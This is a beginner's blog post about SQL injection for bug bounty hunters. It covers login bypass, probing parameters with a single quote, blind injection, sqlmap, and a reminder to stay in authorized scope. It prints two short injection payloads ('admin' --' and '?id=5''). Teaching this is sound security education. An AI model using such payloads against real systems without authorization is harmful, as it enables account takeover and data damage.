Post cover image

June 16, 2026

SQL Injection for Absolute Beginners

Hey friends! Nitin here ๐Ÿ‘‹

Nitin yadav

2 min read

SQL injection. The legendary bug. The one that's been hacking websites for 20+ years and STILL works. Let me explain it so simply that you'll get it in five minutes.

What's A Database, Quickly?

Every app stores its data โ€” users, passwords, orders โ€” in a database. To get data out, the app asks the database questions using a language called SQL. Like: "Give me the user where username = nitin."

So What's SQL Injection?

SQL injection is when YOU sneak your own instructions into that question. The app meant to ask one thing, but you trick it into asking something completely different โ€” like "give me ALL users" or "log me in without a password."

It happens when an app takes your input and dumps it straight into a database query without cleaning it. ๐Ÿ˜ณ

The Classic Example (Login Bypass)

Imagine a login that builds a query like: check where username = (your input) and password = (your input).

Now what if for the username you type:

admin' --

That ' closes off the input early, and -- turns the rest into a comment (ignored). Suddenly the password check vanishes from the query, and you're logged in as admin. No password needed. That's the magic (and horror) of SQLi.

How To Spot It

The first test is almost silly. Find an input โ€” a search box, a URL parameter like ?id=5 โ€” and add a single quote:

?id=5'

If the page throws a database error or behaves weirdly โ†’ ๐Ÿ‘€ you might have found an injection point. Errors are your friend here.

None

Where It Lives In 2026

Real talk: you rarely find SQLi in obvious login forms anymore โ€” those got hardened. Today it hides in:

  • API parameters
  • GraphQL queries
  • Search and filter functions
  • Mobile app endpoints (the app's backend often skips the protections the website has)
  • Old, forgotten endpoints (recon pays off again!)

The Tool: sqlmap

Once you SUSPECT an injection, sqlmap automates the heavy lifting. You feed it a request and it confirms and exploits the injection for you. But โ€” and this matters โ€” learn the manual basics FIRST. If you only know how to point sqlmap at things, you'll miss the subtle injections that need a human brain. Tools confirm; humans discover.

My Honest Tip

Learn "blind" SQL injection too โ€” where there's no error message and no visible data, but the page behaves slightly differently for true vs false conditions. It's harder, fewer people test for it, and that's exactly why it's still findable. The boring, hard stuff is where the bounties hide.

โš ๏ธ And only ever test this on programs that authorize it. SQLi can damage data โ€” be careful and stay in scope.

Next post: SSRF โ€” making the server fetch things it really shouldn't.

Happy hacking! ๐Ÿ’ฅ